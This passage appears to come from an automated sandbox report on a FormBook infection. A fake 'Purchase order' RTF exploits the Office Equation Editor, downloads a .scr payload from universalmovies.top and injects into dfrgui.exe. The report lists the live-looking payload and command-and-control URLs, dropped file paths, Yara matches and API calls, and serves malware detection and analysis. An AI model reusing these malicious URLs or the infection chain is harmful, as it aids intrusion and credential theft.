            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: dfrgui.exe, 00000008.00000002.847604345.0000000003B98000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.0000000003D18000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://jnkinteractive.co.kr/ufuh/?pl=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRh
            Source: dfrgui.exe, 00000008.00000002.847604345.00000000036E2000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.0000000003862000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mrart.co.kr/ufuh/?pl=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847699564.0000000004E39000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.riveramayahousing.com
            Source: eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.000000000403C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.riveramayahousing.com/?fp=ueCFDhaecdvYVx8hbKh0614IfmGTEHuPdqyahOjyxp6XOetDiexINCTsAPUMAD2
            Source: eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847699564.0000000004E39000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.riveramayahousing.com/ufuh/
            Source: dfrgui.exe, 00000008.00000002.847604345.0000000002D76000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.0000000002EF6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.479701614.0000000001BA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/
            Source: dfrgui.exe, 00000008.00000002.847604345.0000000002D76000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.0000000002EF6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.479701614.0000000001BA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
            Source: dfrgui.exe, 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drString found in binary or memory: http://www.sqlite.org/copyright.html.
            Source: dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: dfrgui.exe, 00000008.00000002.847604345.0000000003874000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000039F4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/
            Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.349581619.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/opp.scr
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/opp.scrhhC:
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/opp.scrj
            Source: 13d6pS3.8.drString found in binary or memory: https://www.google.com/favicon.ico
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
            Source: dfrgui.exe, 00000008.00000002.847604345.0000000003A06000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.0000000003B86000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.ibistradingco.com/ufuh/?pl=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZeIW
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: dfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
            Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
            Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49163 version: TLS 1.2

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.op55336.scr.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.op55336.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.411272581.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.847699564.0000000004DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.847192255.00000000002E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.416629798.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.847416646.0000000003360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: MOQ010524Purchase order.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: 6.2.op55336.scr.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 6.2.op55336.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.op55336.scr.3506390.5.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.op55336.scr.3506390.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.op55336.scr.d40000.1.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.op55336.scr.d40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.op55336.scr.24a19c4.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.op55336.scr.249f184.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.411272581.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.847699564.0000000004DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.847192255.00000000002E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.351612822.0000000000D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
            Source: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.416629798.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.847416646.0000000003360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
            Source: Screenshot number: 4Screenshot OCR: Enable editing from the yellow bar above.The independent auditors' opinion says the financial state
            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opp[1].scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\op55336.scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040B0C3 NtCreateSection,6_2_0040B0C3
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040B2E3 NtMapViewOfSection,6_2_0040B2E3
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040AA93 NtSetContextThread,6_2_0040AA93
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040BBB3 NtDelayExecution,6_2_0040BBB3
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040ACA3 NtResumeThread,6_2_0040ACA3
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040B513 NtCreateFile,6_2_0040B513
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040A673 NtSuspendThread,6_2_0040A673
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0042BF43 NtClose,6_2_0042BF43
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040B743 NtReadFile,6_2_0040B743
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040BFD3 NtAllocateVirtualMemory,6_2_0040BFD3
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EA07AC NtCreateMutant,LdrInitializeThunk,6_2_00EA07AC
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9F9F0 NtClose,LdrInitializeThunk,6_2_00E9F9F0
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_00E9FAE8
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_00E9FB68
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_00E9FDC0
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EA00C4 NtCreateFile,6_2_00EA00C4
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EA0060 NtQuerySection,6_2_00EA0060
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EA0078 NtResumeThread,6_2_00EA0078
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EA0048 NtProtectVirtualMemory,6_2_00EA0048
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EA01D4 NtSetValueKey,6_2_00EA01D4
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EA010C NtOpenDirectoryObject,6_2_00EA010C
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EA0C40 NtGetContextThread,6_2_00EA0C40
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EA10D0 NtOpenProcessToken,6_2_00EA10D0
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EA1148 NtOpenThread,6_2_00EA1148
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9F8CC NtWaitForSingleObject,6_2_00E9F8CC
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9F938 NtWriteFile,6_2_00E9F938
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EA1930 NtSetContextThread,6_2_00EA1930
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9F900 NtReadFile,6_2_00E9F900
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FAD0 NtAllocateVirtualMemory,6_2_00E9FAD0
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FAB8 NtQueryValueKey,6_2_00E9FAB8
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FA50 NtEnumerateValueKey,6_2_00E9FA50
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FA20 NtQueryInformationFile,6_2_00E9FA20
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FBE8 NtQueryVirtualMemory,6_2_00E9FBE8
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FBB8 NtQueryInformationToken,6_2_00E9FBB8
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FB50 NtCreateKey,6_2_00E9FB50
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FC90 NtUnmapViewOfSection,6_2_00E9FC90
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FC60 NtMapViewOfSection,6_2_00E9FC60
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FC48 NtSetInformationFile,6_2_00E9FC48
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FC30 NtOpenProcess,6_2_00E9FC30
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FD8C NtDelayExecution,6_2_00E9FD8C
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EA1D80 NtSuspendThread,6_2_00EA1D80
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FD5C NtEnumerateKey,6_2_00E9FD5C
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FED0 NtAdjustPrivilegesToken,6_2_00E9FED0
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FEA0 NtReadVirtualMemory,6_2_00E9FEA0
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FE24 NtWriteVirtualMemory,6_2_00E9FE24
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FFFC NtCreateProcessEx,6_2_00E9FFFC
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FFB4 NtCreateSection,6_2_00E9FFB4
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FF34 NtQueueApcThread,6_2_00E9FF34
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006797182_2_00679718
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 5_2_00153D305_2_00153D30
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 5_2_001532A85_2_001532A8
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_004028846_2_00402884
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_004028906_2_00402890
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0042E2F36_2_0042E2F3
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_004012B06_2_004012B0
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_004033D06_2_004033D0
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00417BEE6_2_00417BEE
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00417BF36_2_00417BF3
